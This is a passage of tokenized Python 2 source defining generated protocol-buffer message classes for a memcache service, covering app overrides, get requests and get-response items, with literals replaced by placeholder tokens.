<EOL> } <EOL> def ErrorCode_Name ( cls , x ) : return cls . _ErrorCode_NAMES . get ( x , "<STR_LIT>" ) <EOL> ErrorCode_Name = classmethod ( ErrorCode_Name ) <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . 
skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class AppOverride ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_app_id_ = <NUM_LIT:0> <EOL> app_id_ = "<STR_LIT>" <EOL> has_num_memcacheg_backends_ = <NUM_LIT:0> <EOL> num_memcacheg_backends_ = <NUM_LIT:0> <EOL> has_ignore_shardlock_ = <NUM_LIT:0> <EOL> ignore_shardlock_ = <NUM_LIT:0> <EOL> has_memcache_pool_hint_ = <NUM_LIT:0> <EOL> memcache_pool_hint_ = "<STR_LIT>" <EOL> has_memcache_sharding_strategy_ = <NUM_LIT:0> <EOL> memcache_sharding_strategy_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def app_id ( self ) : return self . app_id_ <EOL> def set_app_id ( self , x ) : <EOL> self . has_app_id_ = <NUM_LIT:1> <EOL> self . app_id_ = x <EOL> def clear_app_id ( self ) : <EOL> if self . has_app_id_ : <EOL> self . has_app_id_ = <NUM_LIT:0> <EOL> self . app_id_ = "<STR_LIT>" <EOL> def has_app_id ( self ) : return self . has_app_id_ <EOL> def num_memcacheg_backends ( self ) : return self . num_memcacheg_backends_ <EOL> def set_num_memcacheg_backends ( self , x ) : <EOL> self . has_num_memcacheg_backends_ = <NUM_LIT:1> <EOL> self . num_memcacheg_backends_ = x <EOL> def clear_num_memcacheg_backends ( self ) : <EOL> if self . has_num_memcacheg_backends_ : <EOL> self . 
has_num_memcacheg_backends_ = <NUM_LIT:0> <EOL> self . num_memcacheg_backends_ = <NUM_LIT:0> <EOL> def has_num_memcacheg_backends ( self ) : return self . has_num_memcacheg_backends_ <EOL> def ignore_shardlock ( self ) : return self . ignore_shardlock_ <EOL> def set_ignore_shardlock ( self , x ) : <EOL> self . has_ignore_shardlock_ = <NUM_LIT:1> <EOL> self . ignore_shardlock_ = x <EOL> def clear_ignore_shardlock ( self ) : <EOL> if self . has_ignore_shardlock_ : <EOL> self . has_ignore_shardlock_ = <NUM_LIT:0> <EOL> self . ignore_shardlock_ = <NUM_LIT:0> <EOL> def has_ignore_shardlock ( self ) : return self . has_ignore_shardlock_ <EOL> def memcache_pool_hint ( self ) : return self . memcache_pool_hint_ <EOL> def set_memcache_pool_hint ( self , x ) : <EOL> self . has_memcache_pool_hint_ = <NUM_LIT:1> <EOL> self . memcache_pool_hint_ = x <EOL> def clear_memcache_pool_hint ( self ) : <EOL> if self . has_memcache_pool_hint_ : <EOL> self . has_memcache_pool_hint_ = <NUM_LIT:0> <EOL> self . memcache_pool_hint_ = "<STR_LIT>" <EOL> def has_memcache_pool_hint ( self ) : return self . has_memcache_pool_hint_ <EOL> def memcache_sharding_strategy ( self ) : return self . memcache_sharding_strategy_ <EOL> def set_memcache_sharding_strategy ( self , x ) : <EOL> self . has_memcache_sharding_strategy_ = <NUM_LIT:1> <EOL> self . memcache_sharding_strategy_ = x <EOL> def clear_memcache_sharding_strategy ( self ) : <EOL> if self . has_memcache_sharding_strategy_ : <EOL> self . has_memcache_sharding_strategy_ = <NUM_LIT:0> <EOL> self . memcache_sharding_strategy_ = "<STR_LIT>" <EOL> def has_memcache_sharding_strategy ( self ) : return self . has_memcache_sharding_strategy_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_app_id ( ) ) : self . set_app_id ( x . app_id ( ) ) <EOL> if ( x . has_num_memcacheg_backends ( ) ) : self . set_num_memcacheg_backends ( x . num_memcacheg_backends ( ) ) <EOL> if ( x . has_ignore_shardlock ( ) ) : self . 
set_ignore_shardlock ( x . ignore_shardlock ( ) ) <EOL> if ( x . has_memcache_pool_hint ( ) ) : self . set_memcache_pool_hint ( x . memcache_pool_hint ( ) ) <EOL> if ( x . has_memcache_sharding_strategy ( ) ) : self . set_memcache_sharding_strategy ( x . memcache_sharding_strategy ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_app_id_ != x . has_app_id_ : return <NUM_LIT:0> <EOL> if self . has_app_id_ and self . app_id_ != x . app_id_ : return <NUM_LIT:0> <EOL> if self . has_num_memcacheg_backends_ != x . has_num_memcacheg_backends_ : return <NUM_LIT:0> <EOL> if self . has_num_memcacheg_backends_ and self . num_memcacheg_backends_ != x . num_memcacheg_backends_ : return <NUM_LIT:0> <EOL> if self . has_ignore_shardlock_ != x . has_ignore_shardlock_ : return <NUM_LIT:0> <EOL> if self . has_ignore_shardlock_ and self . ignore_shardlock_ != x . ignore_shardlock_ : return <NUM_LIT:0> <EOL> if self . has_memcache_pool_hint_ != x . has_memcache_pool_hint_ : return <NUM_LIT:0> <EOL> if self . has_memcache_pool_hint_ and self . memcache_pool_hint_ != x . memcache_pool_hint_ : return <NUM_LIT:0> <EOL> if self . has_memcache_sharding_strategy_ != x . has_memcache_sharding_strategy_ : return <NUM_LIT:0> <EOL> if self . has_memcache_sharding_strategy_ and self . memcache_sharding_strategy_ != x . memcache_sharding_strategy_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_app_id_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . app_id_ ) ) <EOL> if ( self . has_num_memcacheg_backends_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . num_memcacheg_backends_ ) <EOL> if ( self . 
has_ignore_shardlock_ ) : n += <NUM_LIT:2> <EOL> if ( self . has_memcache_pool_hint_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . memcache_pool_hint_ ) ) <EOL> if ( self . has_memcache_sharding_strategy_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . memcache_sharding_strategy_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_app_id_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . app_id_ ) ) <EOL> if ( self . has_num_memcacheg_backends_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . num_memcacheg_backends_ ) <EOL> if ( self . has_ignore_shardlock_ ) : n += <NUM_LIT:2> <EOL> if ( self . has_memcache_pool_hint_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . memcache_pool_hint_ ) ) <EOL> if ( self . has_memcache_sharding_strategy_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . memcache_sharding_strategy_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_app_id ( ) <EOL> self . clear_num_memcacheg_backends ( ) <EOL> self . clear_ignore_shardlock ( ) <EOL> self . clear_memcache_pool_hint ( ) <EOL> self . clear_memcache_sharding_strategy ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . app_id_ ) <EOL> if ( self . has_num_memcacheg_backends_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . num_memcacheg_backends_ ) <EOL> if ( self . has_ignore_shardlock_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putBoolean ( self . ignore_shardlock_ ) <EOL> if ( self . has_memcache_pool_hint_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . memcache_pool_hint_ ) <EOL> if ( self . has_memcache_sharding_strategy_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . memcache_sharding_strategy_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . 
has_app_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . app_id_ ) <EOL> if ( self . has_num_memcacheg_backends_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . num_memcacheg_backends_ ) <EOL> if ( self . has_ignore_shardlock_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putBoolean ( self . ignore_shardlock_ ) <EOL> if ( self . has_memcache_pool_hint_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . memcache_pool_hint_ ) <EOL> if ( self . has_memcache_sharding_strategy_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . memcache_sharding_strategy_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_app_id ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_num_memcacheg_backends ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_ignore_shardlock ( d . getBoolean ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_memcache_pool_hint ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_memcache_sharding_strategy ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_app_id_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . app_id_ ) ) <EOL> if self . has_num_memcacheg_backends_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . num_memcacheg_backends_ ) ) <EOL> if self . has_ignore_shardlock_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatBool ( self . ignore_shardlock_ ) ) <EOL> if self . 
has_memcache_pool_hint_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . memcache_pool_hint_ ) ) <EOL> if self . has_memcache_sharding_strategy_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . memcache_sharding_strategy_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kapp_id = <NUM_LIT:1> <EOL> knum_memcacheg_backends = <NUM_LIT:2> <EOL> kignore_shardlock = <NUM_LIT:3> <EOL> kmemcache_pool_hint = <NUM_LIT:4> <EOL> kmemcache_sharding_strategy = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheGetRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_for_cas_ = <NUM_LIT:0> <EOL> for_cas_ = <NUM_LIT:0> <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . key_ = [ ] <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key_size ( self ) : return len ( self . 
key_ ) <EOL> def key_list ( self ) : return self . key_ <EOL> def key ( self , i ) : <EOL> return self . key_ [ i ] <EOL> def set_key ( self , i , x ) : <EOL> self . key_ [ i ] = x <EOL> def add_key ( self , x ) : <EOL> self . key_ . append ( x ) <EOL> def clear_key ( self ) : <EOL> self . key_ = [ ] <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def for_cas ( self ) : return self . for_cas_ <EOL> def set_for_cas ( self , x ) : <EOL> self . has_for_cas_ = <NUM_LIT:1> <EOL> self . for_cas_ = x <EOL> def clear_for_cas ( self ) : <EOL> if self . has_for_cas_ : <EOL> self . has_for_cas_ = <NUM_LIT:0> <EOL> self . for_cas_ = <NUM_LIT:0> <EOL> def has_for_cas ( self ) : return self . has_for_cas_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . key_size ( ) ) : self . add_key ( x . key ( i ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_for_cas ( ) ) : self . set_for_cas ( x . for_cas ( ) ) <EOL> if ( x . 
has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . key_ ) != len ( x . key_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . key_ , x . key_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_for_cas_ != x . has_for_cas_ : return <NUM_LIT:0> <EOL> if self . has_for_cas_ and self . for_cas_ != x . for_cas_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . key_ ) <EOL> for i in xrange ( len ( self . key_ ) ) : n += self . lengthString ( len ( self . key_ [ i ] ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_for_cas_ ) : n += <NUM_LIT:2> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:1> * len ( self . key_ ) <EOL> for i in xrange ( len ( self . key_ ) ) : n += self . lengthString ( len ( self . key_ [ i ] ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_for_cas_ ) : n += <NUM_LIT:2> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . 
override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_name_space ( ) <EOL> self . clear_for_cas ( ) <EOL> self . clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . key_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ [ i ] ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_for_cas_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putBoolean ( self . for_cas_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . key_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ [ i ] ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_for_cas_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putBoolean ( self . for_cas_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . add_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:32> : <EOL> self . set_for_cas ( d . getBoolean ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . 
skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . key_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % ( elm , self . DebugFormatString ( e ) ) ) <EOL> cnt += <NUM_LIT:1> <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . has_for_cas_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatBool ( self . for_cas_ ) ) <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kkey = <NUM_LIT:1> <EOL> kname_space = <NUM_LIT:2> <EOL> kfor_cas = <NUM_LIT:4> <EOL> koverride = <NUM_LIT:5> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:key>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> } , <NUM_LIT:5> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:5> , ProtocolBuffer . Encoder . 
MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheGetResponse_Item ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_value_ = <NUM_LIT:0> <EOL> value_ = "<STR_LIT>" <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> has_cas_id_ = <NUM_LIT:0> <EOL> cas_id_ = <NUM_LIT:0> <EOL> has_expires_in_seconds_ = <NUM_LIT:0> <EOL> expires_in_seconds_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def value ( self ) : return self . value_ <EOL> def set_value ( self , x ) : <EOL> self . has_value_ = <NUM_LIT:1> <EOL> self . value_ = x <EOL> def clear_value ( self ) : <EOL> if self . has_value_ : <EOL> self . has_value_ = <NUM_LIT:0> <EOL> self . value_ = "<STR_LIT>" <EOL> def has_value ( self ) : return self . has_value_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def cas_id ( self ) : return self . cas_id_ <EOL> def set_cas_id ( self , x ) : <EOL> self . has_cas_id_ = <NUM_LIT:1> <EOL> self . cas_id_ = x <EOL> def clear_cas_id ( self ) : <EOL> if self . has_cas_id_ : <EOL> self . has_cas_id_ = <NUM_LIT:0> <EOL> self . cas_id_ = <NUM_LIT:0> <EOL> def has_cas_id ( self ) : return self . 
has_cas_id_ <EOL> def expires_in_seconds ( self ) : return self . expires_in_seconds_ <EOL> def set_expires_in_seconds ( self , x ) : <EOL> self . has_expires_in_seconds_ = <NUM_LIT:1> <EOL> self . expires_in_seconds_ = x <EOL> def clear_expires_in_seconds ( self ) : <EOL> if self . has_expires_in_seconds_ : <EOL> self . has_expires_in_seconds_ = <NUM_LIT:0> <EOL> self . expires_in_seconds_ = <NUM_LIT:0> <EOL> def has_expires_in_seconds ( self ) : return self . has_expires_in_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_value ( ) ) : self . set_value ( x . value ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> if ( x . has_cas_id ( ) ) : self . set_cas_id ( x . cas_id ( ) ) <EOL> if ( x . has_expires_in_seconds ( ) ) : self . set_expires_in_seconds ( x . expires_in_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> if self . has_cas_id_ != x . has_cas_id_ : return <NUM_LIT:0> <EOL> if self . has_cas_id_ and self . cas_id_ != x . cas_id_ : return <NUM_LIT:0> <EOL> if self . has_expires_in_seconds_ != x . has_expires_in_seconds_ : return <NUM_LIT:0> <EOL> if self . has_expires_in_seconds_ and self . expires_in_seconds_ != x . expires_in_seconds_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . 
has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_cas_id_ ) : n += <NUM_LIT:9> <EOL> if ( self . has_expires_in_seconds_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . expires_in_seconds_ ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> if ( self . has_cas_id_ ) : n += <NUM_LIT:9> <EOL> if ( self . has_expires_in_seconds_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . expires_in_seconds_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_value ( ) <EOL> self . clear_flags ( ) <EOL> self . clear_cas_id ( ) <EOL> self . clear_expires_in_seconds ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> if ( self . has_cas_id_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put64 ( self . cas_id_ ) <EOL> if ( self . has_expires_in_seconds_ ) : <EOL> out . 